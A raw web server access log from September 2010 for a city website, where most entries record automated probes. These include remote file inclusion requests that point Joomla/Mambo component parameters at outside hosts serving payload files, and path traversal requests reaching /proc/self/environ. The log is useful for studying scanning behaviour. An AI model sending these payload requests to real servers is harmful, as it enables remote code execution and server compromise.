174.121.166.146 - - [02/Sep/2010:03:41:05 -0700] "GET /logs/access_091231.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:41:05 -0700] "GET /logs/access_091231.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:42:02 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:42:02 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:42:02 -0700] "GET /logs/access_091231.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:42:14 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:42:14 -0700] "GET /logs/access_091231.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:42:14 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:42:17 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:42:17 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:42:18 -0700] "GET /logs/access_091231.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:44:25 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:44:25 -0700] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:44:25 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:44:29 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:44:29 -0700] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:44:29 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:44:32 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:44:32 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:44:32 -0700] "GET /logs/access.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.195.112.33 - - [02/Sep/2010:03:44:40 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:45:26 -0700] "GET /logs/access_091231.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:45:34 -0700] "GET /logs/access_091231.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:45:37 -0700] "GET /logs/access_091231.log%20%20/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.195.112.33 - - [02/Sep/2010:03:45:43 -0700] "GET /logs/access_100531.log HTTP/1.0" 200 13458366 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:17 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:17 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:17 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:17 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:17 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:17 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:23 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:23 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:23 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:28 -0700] "GET /logs/access_091231.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:29 -0700] "GET /logs/access_091231.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
174.121.166.146 - - [02/Sep/2010:03:46:35 -0700] "GET /logs/access_091231.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://nhplm.org/_nersc1/modules/mod_feed/tmpl/data/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [02/Sep/2010:03:46:39 -0700] "POST /logs/access_100201.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
187.45.193.226 - - [02/Sep/2010:03:46:40 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
187.45.193.226 - - [02/Sep/2010:03:46:40 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
187.45.193.226 - - [02/Sep/2010:03:48:57 -0700] "POST /logs/access_090731.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:55:03 -0700] "GET /errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:55:03 -0700] "GET /logs//errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:55:03 -0700] "GET /logs/access_090731.log%20%20//errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
187.45.193.226 - - [02/Sep/2010:03:55:13 -0700] "POST /logs/access_100201.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
187.45.193.226 - - [02/Sep/2010:03:55:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
187.45.193.226 - - [02/Sep/2010:03:55:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:56:30 -0700] "GET /errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:56:30 -0700] "GET /logs//errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:03:56:30 -0700] "GET /logs/access_090731.log%20%20//errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
75.127.98.12 - - [02/Sep/2010:04:22:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:24:38 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:24:39 -0700] "GET /logs/access_091231.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:24:41 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:25:13 -0700] "GET /logs/access_091231.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:25:13 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:25:15 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:25:24 -0700] "GET /logs/access_100201.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:25:25 -0700] "GET /logs/access_100201.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:29:58 -0700] "GET /logs/access_091231.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:29:58 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:29:59 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:31:19 -0700] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:31:19 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:31:19 -0700] "GET /logs/access_091231.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:32:13 -0700] "GET /logs/access_100201.log%20%20//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
217.217.86.204 - - [02/Sep/2010:04:32:41 -0700] "HEAD /logs/access.log HTTP/1.0" 200 0 "-" "Wget/1.11.4" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:33:12 -0700] "GET /logs/access_100201.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.46.199.47 - - [02/Sep/2010:04:33:57 -0700] "GET / HTTP/1.1" 200 917 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "cityofarkadelphia.com"
72.14.212.84 - - [02/Sep/2010:04:37:22 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "AppEngine-Google; (+http://code.google.com/appengine; appid: getfavicon)" "cityofarkadelphia.com"
72.14.212.85 - - [02/Sep/2010:04:37:22 -0700] "GET / HTTP/1.1" 200 917 "-" "AppEngine-Google; (+http://code.google.com/appengine; appid: getfavicon)" "cityofarkadelphia.com"
119.63.193.247 - - [02/Sep/2010:04:42:18 -0700] "GET /Downloads/LeadAR.ppt HTTP/1.1" 200 786432 "-" "Baiduspider+(+http://help.baidu.jp/system/05.html)" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:43:17 -0700] "GET /logs/access_100331.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:43:17 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:43:17 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:43:17 -0700] "GET /logs/access_100101.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:46:29 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:46:29 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:46:29 -0700] "GET /logs/access_091201.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
213.180.209.11 - - [02/Sep/2010:04:46:46 -0700] "GET /logs/access_100701.log HTTP/1.1" 200 8310606 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "cityofarkadelphia.com"
75.127.98.12 - - [02/Sep/2010:04:47:02 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
75.127.98.12 - - [02/Sep/2010:04:47:02 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
75.127.98.12 - - [02/Sep/2010:04:47:02 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:47:45 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:47:45 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:47:45 -0700] "GET /logs/access_100330.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:47:45 -0700] "GET /logs/access_100401.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:48:23 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:48:23 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:48:24 -0700] "GET /logs/access_091201.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:48:48 -0700] "GET /logs/access_091201.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:48:48 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:48:49 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:18 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:19 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:19 -0700] "GET /logs/access_091231.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:38 -0700] "GET /logs/access_091201.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:40 -0700] "GET /logs/access_091231.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
207.45.183.226 - - [02/Sep/2010:04:49:47 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:48 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:49 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:50 -0700] "GET /logs/access_091231.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:58 -0700] "GET /logs/access_091201.log%20%20///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:49:59 -0700] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:50:01 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
222.236.47.182 - - [02/Sep/2010:04:50:02 -0700] "GET /logs/access.log///components/com_cpg/cpg.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
